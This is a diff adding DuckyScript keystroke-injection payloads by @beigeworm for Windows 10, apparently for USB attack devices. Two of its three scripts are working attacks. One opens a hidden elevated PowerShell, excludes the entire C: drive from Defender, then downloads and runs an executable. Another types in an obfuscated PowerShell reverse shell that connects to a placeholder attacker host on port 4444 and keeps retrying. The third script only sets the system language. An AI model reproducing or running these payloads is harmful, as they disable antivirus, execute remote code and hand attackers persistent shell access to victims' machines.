+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;
+
+REM replace FILE_URL_HERE below.
+STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit
+
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
--- a/Language.txt
+++ b/Language.txt
@@ -0,0 +1,30 @@
+REM Title: Set System Language
+REM Author: @beigeworm
+REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US).
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM set system language to (example here is US)
+STRING Dism /online /Get-Intl
+ENTER
+DELAY 500
+STRING Set-WinSystemLocale en-US
+ENTER
+DELAY 500
+STRING Set-WinUserLanguageList en-US -force
+ENTER
+DELAY 500
+STRING exit
+ENTER
+
--- a/Tools/Simple
+++ b/Tools/Simple
@@ -0,0 +1,28 @@
+REM Title: Simple NetCat Client
+REM Author: @beigeworm
+REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted.
+REM Target: Windows 10
+
+REM *REQUIREMENTS*
+REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444).
+
+REM *SETUP*
+REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address.
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM write out the main Powershell code.
+STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444)
+STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
+STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)
+ENTER